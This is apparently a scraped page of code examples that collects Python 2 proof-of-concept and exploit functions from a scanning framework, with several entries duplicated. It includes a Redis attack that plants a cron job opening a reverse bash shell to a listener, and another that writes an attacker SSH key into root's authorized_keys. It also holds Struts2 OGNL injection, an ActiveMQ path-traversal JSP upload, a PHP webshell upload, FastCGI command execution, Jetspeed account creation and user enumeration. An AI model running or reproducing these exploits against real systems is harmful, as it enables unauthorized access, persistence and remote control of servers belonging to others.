Exemplo n.º 1
0
def poc(url):
    url = host2IP(url)
    ip = url.split(":")[0]
    port = int(url.split(":")[-1]) if ":" in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # 判断web服务
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                real_url = ip + ":" + str(web_port)
            break  # TODO 这里简单化处理,只返回了一个端口的结果
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if "redis_version" not in r.info():  # 判断未授权访问
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # 判断可写
        r.config_set("dir", "/root/")  # 判断对/var/www的写入权限(目前先判断为root)
        r.config_set("dbfilename", "dump.rdb")  # 判断操作权限
        r.delete(key)
        r.save()  # 判断可导出
    except Exception, e:
        return False
Exemplo n.º 2
0
def poc(url):
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:
        if not ENABLE_EXP:
            return False
Exemplo n.º 3
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # 判断web服务
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO 这里简单化处理,只返回了一个端口的结果
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # 判断未授权访问
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # 判断可写
        r.config_set('dir', '/root/')  # 判断对/var/www的写入权限(目前先判断为root)
        r.config_set('dbfilename', 'dump.rdb')  # 判断操作权限
        r.delete(key)
        r.save()  # 判断可导出
    except Exception, e:
        return False
Exemplo n.º 4
0
def poc(url):
    url = url if '://' in url else 'http://' + url
    path = url + '/dapur/apps/app_theme/libs/'
    filename = randomString(5) + '.php'
    upload_path = path + 'save_file.php'
    shell_path = path + filename
    plain, cipher = randomMD5()

    post_data = {
        'content': '<?php echo md5("{}");?>'.format(plain),
        'src': filename
    }

    header_data = {'Referer': 'http://localhost/'}

    try:
        r = requests.post(url=upload_path,
                          data=post_data,
                          headers=header_data,
                          timeout=3)
        shell = requests.get(shell_path)
        if r.status_code is 200 and cipher in shell.content:
            return True

    except Exception:
        return False

    return False
Exemplo n.º 5
0
def poc(host):
    ans = []
    base_time = getResponseTime(randomString(), host)
    for user in users:
        if getResponseTime(user, host) - base_time > delay:
            ans.append(user)
    return ans if ans.__len__() else False
Exemplo n.º 6
0
def poc(host):
    ans = []
    base_time = getResponseTime(randomString(), host)
    for user in users:
        if getResponseTime(user, host) - base_time > delay:
            ans.append(user)
    return ans if ans.__len__() else False
Exemplo n.º 7
0
def poc(base):
    base = "http://" + base if "://" not in base else base
    name = randomString(5)
    uri = "{url}/admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
    target = r"{url}/fileserver/sex../../..\admin/{name}.jsp".format(url=base.rstrip("/"), name=name)
    key = base64.b64encode("admin:admin")
    headers = {"Authorization": "Basic %s}" % key, "User-Agent": "Mozilla/5.0 Gecko/20100101 Firefox/45.0"}
    put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
    try:
        res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
        res2 = requests.get(uri, headers=headers, timeout=10)
        if res1.status_code == 204 and res2.status_code == 200:
            if ENABLE_EXP:
                return uri
            return uri if put_data in res2.content else False
    except Exception, error:
        # print error
        return False
Exemplo n.º 8
0
def poc(url):
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        requests.post(url1,
                      data=data1,
                      headers={'User-Agent': firefox},
                      timeout=10,
                      verify=False)
        c = requests.post(url1,
                          data=data1,
                          headers={
                              'User-Agent': firefox
                          },
                          timeout=10,
                          verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:
        if not ENABLE_EXP:
            return False
Exemplo n.º 9
0
def poc(base):
    base = "http://" + base if '://' not in base else base
    name = randomString(5)
    uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name)
    target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(
        url=base.rstrip('/'), name=name)
    key = base64.b64encode("admin:admin")
    headers = {
        'Authorization': 'Basic %s}' % key,
        'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'
    }
    put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10)
    try:
        res1 = requests.put(target, headers=headers, data=put_data, timeout=10)
        res2 = requests.get(uri, headers=headers, timeout=10)
        if res1.status_code == 204 and res2.status_code == 200:
            if ENABLE_EXP:
                return uri
            return uri if put_data in res2.content else False
    except Exception:
        return False
    return False
def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')
    data = {
        "siteid": "1",
        "modelid": "1",
        "username": randomString(10),
        "password": randomString(10),
        "email": "{}@qq.com".format(randomString()),
        "info[content]": "<img src={}?.php#.jpg>".format(PUBLIC_URL),
        "dosubmit": "1",
        "protocol": "",
    }

    target_url = url + "/index.php?m=member&c=index&a=register&siteid=1"
    try:
        r = requests.post(target_url, data=data, timeout=TIMEOUT)
        if "MySQL Error" in r.content and "http" in r.content:
            successUrl = r.text[r.text.index("http"):r.text.index(".php")] + ".php"
            return successUrl
    except Exception:
        return False
Exemplo n.º 11
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        return False
Exemplo n.º 12
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        logging.debug(e)
Exemplo n.º 13
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
        if 'redis_version' in r.info():
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,
                                                                                             port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            key = randomString(10)
            r.set(key, payload)
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            return True
    except Exception, e:
        # print e
        return False
Exemplo n.º 14
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
        if 'redis_version' in r.info():
            payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
                ip=listen_ip, port=str(listen_port))
            path = '/var/spool/cron'
            name = 'root'
            key = randomString(10)
            r.set(key, payload)
            r.config_set('dir', path)
            r.config_set('dbfilename', name)
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            return True
    except Exception, e:
        # print e
        return False
Exemplo n.º 15
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception, e:
        # print e
        return False
Exemplo n.º 16
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception:
        return False
    return False
Exemplo n.º 17
0
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = [email protected]
"""
PHP FastCGI Fileread/RCE PoC & Exp
"""

from plugin.util import randomString
import socket

PORT = 9000

EXPLOIT = False  # set "True" to exec system commands
COMMAND = 'whoami'
PHP_FILE_PATH = '/usr/share/php/PEAR.php'
FLAG = randomString(10) if EXPLOIT else ':root:'


def poc(ip):
    payload = exp_data() if EXPLOIT else poc_data()

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3.0)
    try:
        sock.connect((ip, PORT))
        sock.send(payload)
        ret = sock.recv(1024)
        sock.close()

        if ret.find(FLAG):
            return ip + ' -> ' + ret.split(FLAG)[1] if EXPLOIT else True
Exemplo n.º 18
0
"""

import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception, e:
            return False
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:
        return False
    return False